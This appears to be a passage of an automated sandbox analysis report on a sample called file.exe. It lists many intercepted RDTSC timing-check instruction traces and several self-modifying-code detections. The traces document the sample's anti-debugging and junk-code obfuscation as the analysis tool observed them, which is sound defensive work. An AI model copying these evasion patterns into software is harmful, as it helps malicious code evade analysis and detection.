              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0344 second address: 4FC039E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [769B4538h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F80ACC66782h 0x00000013 sbb ecx, 776A29B8h 0x00000019 jmp 00007F80ACC6677Bh 0x0000001e popfd 0x0000001f mov bx, cx 0x00000022 popad 0x00000023 xor dword ptr [ebp-08h], eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007F80ACC6677Eh 0x0000002f and ch, 00000018h 0x00000032 jmp 00007F80ACC6677Bh 0x00000037 popfd 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC039E second address: 4FC03AF instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, bh 0x00000008 popad 0x00000009 xor eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC03AF second address: 4FC03B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC03B3 second address: 4FC03B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC03B9 second address: 4FC03BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC03BF second address: 4FC03C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC03C3 second address: 4FC0422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jmp 00007F80ACC66782h 0x0000000f pushad 0x00000010 mov ax, E897h 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp], eax 0x0000001b pushad 0x0000001c movzx ecx, bx 0x0000001f call 00007F80ACC66781h 0x00000024 mov esi, 27727E77h 0x00000029 pop ecx 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 jmp 00007F80ACC66784h 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0019 second address: 4FB001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB001D second address: 4FB0021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0021 second address: 4FB0027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0027 second address: 4FB0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0036 second address: 4FB003A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB003A second address: 4FB0071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F80ACC66784h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F80ACC66787h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0071 second address: 4FB00A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503259h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F80AC50324Ch 0x00000011 mov ebx, esi 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 mov si, dx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB00A5 second address: 4FB012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 sub esp, 2Ch 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushfd 0x0000000c jmp 00007F80ACC66788h 0x00000011 and cl, 00000068h 0x00000014 jmp 00007F80ACC6677Bh 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F80ACC66784h 0x00000023 and cx, 22C8h 0x00000028 jmp 00007F80ACC6677Bh 0x0000002d popfd 0x0000002e mov bx, si 0x00000031 popad 0x00000032 push eax 0x00000033 pushad 0x00000034 mov dx, C136h 0x00000038 mov eax, ebx 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c jmp 00007F80ACC66789h 0x00000041 xchg eax, edi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB012E second address: 4FB0137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 7D9Ch 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01B1 second address: 4FB01B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01B7 second address: 4FB01BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01BB second address: 4FB01DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC6677Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80ACC6677Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01DE second address: 4FB01E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01E4 second address: 4FB01E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01E8 second address: 4FB01EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB01EC second address: 4FB0201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f mov ecx, 4F28CC03h 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0201 second address: 4FB0207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0207 second address: 4FB020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB020B second address: 4FB0239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F80AC5034A9h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F80AC503255h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0239 second address: 4FB02B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d mov ecx, 060BB3C3h 0x00000012 pushfd 0x00000013 jmp 00007F80ACC66788h 0x00000018 adc ax, 2A88h 0x0000001d jmp 00007F80ACC6677Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov dword ptr [ebp-14h], edi 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushfd 0x0000002b jmp 00007F80ACC66782h 0x00000030 jmp 00007F80ACC66785h 0x00000035 popfd 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB02D2 second address: 4FB02FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F80AC503254h 0x0000000a sbb al, FFFFFFA8h 0x0000000d jmp 00007F80AC50324Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB02FB second address: 4FB0320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0320 second address: 4FB0342 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F80AC503251h 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, F30Ah 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB038B second address: 4FB03FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7BEC7804h 0x00000008 pushfd 0x00000009 jmp 00007F80ACC6677Dh 0x0000000e or si, 6346h 0x00000013 jmp 00007F80ACC66781h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jg 00007F811E614847h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F80ACC66783h 0x0000002b or si, FA7Eh 0x00000030 jmp 00007F80ACC66789h 0x00000035 popfd 0x00000036 mov ax, 54C7h 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB03FC second address: 4FB0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0402 second address: 4FB0406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0406 second address: 4FB0470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F80AC5032B7h 0x0000000e pushad 0x0000000f push edi 0x00000010 pushfd 0x00000011 jmp 00007F80AC50324Ch 0x00000016 jmp 00007F80AC503255h 0x0000001b popfd 0x0000001c pop eax 0x0000001d mov eax, edi 0x0000001f popad 0x00000020 cmp dword ptr [ebp-14h], edi 0x00000023 jmp 00007F80AC503253h 0x00000028 jne 00007F811DEB128Eh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F80AC503255h 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0470 second address: 4FB04D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov eax, 388879F3h 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-2Ch] 0x00000019 jmp 00007F80ACC66782h 0x0000001e xchg eax, esi 0x0000001f jmp 00007F80ACC66780h 0x00000024 push eax 0x00000025 jmp 00007F80ACC6677Bh 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e call 00007F80ACC6677Eh 0x00000033 pop esi 0x00000034 popad 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB04D8 second address: 4FB04DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB04DE second address: 4FB04ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB04ED second address: 4FB0508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503257h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0508 second address: 4FB05B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F80ACC66781h 0x0000000f nop 0x00000010 jmp 00007F80ACC6677Eh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 mov al, A9h 0x00000019 call 00007F80ACC66783h 0x0000001e mov eax, 6C6C3D8Fh 0x00000023 pop eax 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F80ACC66780h 0x0000002d xor esi, 4C7E7538h 0x00000033 jmp 00007F80ACC6677Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F80ACC66788h 0x0000003f xor ah, FFFFFF98h 0x00000042 jmp 00007F80ACC6677Bh 0x00000047 popfd 0x00000048 popad 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB05B9 second address: 4FB05BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB05BD second address: 4FB05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB05F0 second address: 4FB0631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80AC50324Fh 0x00000009 or eax, 6F848A6Eh 0x0000000f jmp 00007F80AC503259h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov esi, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ebx 0x00000020 pop ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0631 second address: 4FB0636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0636 second address: 4FA0DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c push ecx 0x0000000d movsx edx, si 0x00000010 pop eax 0x00000011 mov bl, 96h 0x00000013 popad 0x00000014 je 00007F811DEB1248h 0x0000001a xor eax, eax 0x0000001c jmp 00007F80AC4DC97Ah 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 sub esp, 04h 0x0000002c mov esi, eax 0x0000002e cmp esi, 00000000h 0x00000031 setne al 0x00000034 xor ebx, ebx 0x00000036 test al, 01h 0x00000038 jne 00007F80AC503247h 0x0000003a jmp 00007F80AC50334Fh 0x0000003f call 00007F80B136FA40h 0x00000044 mov edi, edi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0DE3 second address: 4FA0DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0DE7 second address: 4FA0DED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0DED second address: 4FA0DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0DF3 second address: 4FA0DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0DF7 second address: 4FA0E42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC6677Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F80ACC66780h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F80ACC6677Ch 0x0000001b or si, 8258h 0x00000020 jmp 00007F80ACC6677Bh 0x00000025 popfd 0x00000026 movzx eax, bx 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0E42 second address: 4FA0EAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503252h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F80AC503250h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 movzx eax, dx 0x00000015 pushfd 0x00000016 jmp 00007F80AC503253h 0x0000001b adc eax, 1CBD532Eh 0x00000021 jmp 00007F80AC503259h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, edi 0x0000002e movsx edi, ax 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0EAE second address: 4FA0EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0EBE second address: 4FA0EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F80AC50324Eh 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F80AC503257h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0EEF second address: 4FA0F19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FA0F19 second address: 4FA0F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0B18 second address: 4FB0B4F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F80ACC66786h 0x00000008 add esi, 1F60CAB8h 0x0000000e jmp 00007F80ACC6677Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx ecx, dx 0x00000019 popad 0x0000001a push ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0B4F second address: 4FB0B91 instructions: 0x00000000 rdtsc 0x00000002 call 00007F80AC50324Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F80AC50324Bh 0x00000010 sbb cl, 0000002Eh 0x00000013 jmp 00007F80AC503259h 0x00000018 popfd 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0B91 second address: 4FB0B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0B97 second address: 4FB0C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC503252h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F80AC50324Eh 0x00000012 adc al, 00000008h 0x00000015 jmp 00007F80AC50324Bh 0x0000001a popfd 0x0000001b mov bl, ch 0x0000001d popad 0x0000001e cmp dword ptr [769B459Ch], 05h 0x00000025 pushad 0x00000026 pushad 0x00000027 mov edi, 140D8F02h 0x0000002c popad 0x0000002d pushfd 0x0000002e jmp 00007F80AC503256h 0x00000033 adc ecx, 01E3CE98h 0x00000039 jmp 00007F80AC50324Bh 0x0000003e popfd 0x0000003f popad 0x00000040 je 00007F811DEA103Bh 0x00000046 jmp 00007F80AC503256h 0x0000004b pop ebp 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0C2C second address: 4FB0C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F80ACC66783h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0C45 second address: 4FB0C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80AC503255h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0C5E second address: 4FB0C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FB0D4B second address: 4FB0D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A4E second address: 4FC0A5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F80ACC6677Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A5E second address: 4FC0A9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80AC50324Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F80AC503256h 0x00000012 xchg eax, esi 0x00000013 jmp 00007F80AC503250h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A9F second address: 4FC0AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AA3 second address: 4FC0AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AA7 second address: 4FC0AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AAD second address: 4FC0B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80AC503255h 0x00000009 adc esi, 192637A6h 0x0000000f jmp 00007F80AC503251h 0x00000014 popfd 0x00000015 mov dh, al 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F80AC503253h 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 push esi 0x00000025 mov edx, 608B37B6h 0x0000002a pop edi 0x0000002b call 00007F80AC50324Ch 0x00000030 pop ecx 0x00000031 popad 0x00000032 test esi, esi 0x00000034 pushad 0x00000035 call 00007F80AC503253h 0x0000003a mov ch, 2Dh 0x0000003c pop edx 0x0000003d call 00007F80AC503252h 0x00000042 mov ebx, eax 0x00000044 pop esi 0x00000045 popad 0x00000046 je 00007F811DE90ABEh 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F80AC50324Fh 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B58 second address: 4FC0B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80ACC66789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 15C9A1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 15A546 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 31E8C8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 393B09 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 641DB83 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65C7D82 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65C8160 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65C69BD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65D9455 instructions caused by: Self-modifying code
